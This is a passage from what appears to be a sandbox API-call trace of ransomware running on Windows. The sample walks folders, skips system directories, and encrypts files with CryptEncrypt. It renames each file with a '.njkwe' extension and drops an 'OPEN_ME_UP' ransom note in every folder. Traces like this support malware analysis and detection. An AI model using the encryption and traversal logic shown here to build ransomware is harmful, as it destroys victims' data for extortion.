(normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.339] GetProcessHeap () returned 0xbe0000 [0075.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.340] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53de90cb, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53de90cb, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53de90cb, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1ac, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0075.340] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0075.340] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0075.340] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.341] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0075.342] CloseHandle (hObject=0x434) returned 1 [0075.342] GetProcessHeap () returned 0xbe0000 [0075.342] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.342] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0075.342] FindClose (in: hFindFile=0xc1a260 | out: hFindFile=0xc1a260) returned 1 [0075.342] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0075.342] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.344] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0075.345] CloseHandle (hObject=0x430) returned 1 [0075.345] GetProcessHeap () returned 0xbe0000 [0075.345] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0075.345] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", cAlternateFileName="{33D78~1")) returned 1 [0075.345] lstrcmpiW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="Windows") returned -1 [0075.346] lstrcmpiW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="$Recycle.bin") returned 1 [0075.346] lstrcmpiW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="System Volume Information") returned -1 [0075.346] lstrcmpiW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="Program Files") returned -1 [0075.346] lstrcmpiW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="Program Files (x86)") returned -1 [0075.346] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}") returned 80 [0075.346] lstrcmpW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2=".") returned 1 [0075.346] lstrcmpW (lpString1="{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="..") returned 1 [0075.346] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.346] GetProcessHeap () returned 0xbe0000 [0075.346] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0075.346] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\*") returned 82 [0075.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0075.373] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.373] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.373] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.373] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.373] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.373] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\.") returned 82 [0075.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.373] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.373] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.373] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.373] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.373] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.373] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.373] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\..") returned 83 [0075.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.373] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ed1a9f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ed1a9f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ef7d10, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x59f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0075.373] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0075.373] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0075.373] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0075.373] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0075.373] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0075.373] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml") returned 99 [0075.373] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0075.373] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.373] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0075.373] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.374] GetTickCount () returned 0x1153312 [0075.374] GetTickCount () returned 0x1153312 [0075.374] GetTickCount () returned 0x1153312 [0075.374] GetTickCount () returned 0x1153312 [0075.374] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.375] GetProcessHeap () returned 0xbe0000 [0075.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.375] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x59f, lpOverlapped=0x0) returned 1 [0075.377] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffa61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.377] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x59f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x59f, lpOverlapped=0x0) returned 1 [0075.377] GetProcessHeap () returned 0xbe0000 [0075.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.377] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.377] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.377] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.377] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.377] CloseHandle (hObject=0x434) returned 1 [0075.377] GetProcessHeap () returned 0xbe0000 [0075.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.377] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0075.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.378] GetProcessHeap () returned 0xbe0000 [0075.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.378] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ed1a9f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ed1a9f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ed1a9f, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0075.378] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0075.378] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0075.378] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0075.378] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0075.378] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0075.378] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml") returned 100 [0075.378] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0075.378] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.378] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0075.378] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.378] GetTickCount () returned 0x1153312 [0075.379] GetTickCount () returned 0x1153312 [0075.379] GetTickCount () returned 0x1153312 [0075.379] GetTickCount () returned 0x1153312 [0075.379] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.379] GetProcessHeap () returned 0xbe0000 [0075.379] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.379] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.380] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.380] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.380] GetProcessHeap () returned 0xbe0000 [0075.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.380] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.380] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.383] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.383] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.384] CloseHandle (hObject=0x434) returned 1 [0075.384] GetProcessHeap () returned 0xbe0000 [0075.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.384] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0075.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.384] GetProcessHeap () returned 0xbe0000 [0075.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.385] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0075.385] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0075.385] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0075.385] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0075.385] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0075.385] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0075.385] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov") returned 85 [0075.385] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0075.385] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0075.385] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.385] GetProcessHeap () returned 0xbe0000 [0075.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.385] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\*") returned 87 [0075.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0075.386] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.386] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.386] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.386] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.386] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.386] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\.") returned 87 [0075.386] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.386] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.386] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.386] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.386] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.386] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.387] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.387] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\..") returned 88 [0075.387] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.387] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0075.387] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0075.387] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0075.387] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0075.387] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0075.387] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0075.387] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime") returned 93 [0075.387] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0075.387] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0075.387] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.387] GetProcessHeap () returned 0xbe0000 [0075.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.387] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: 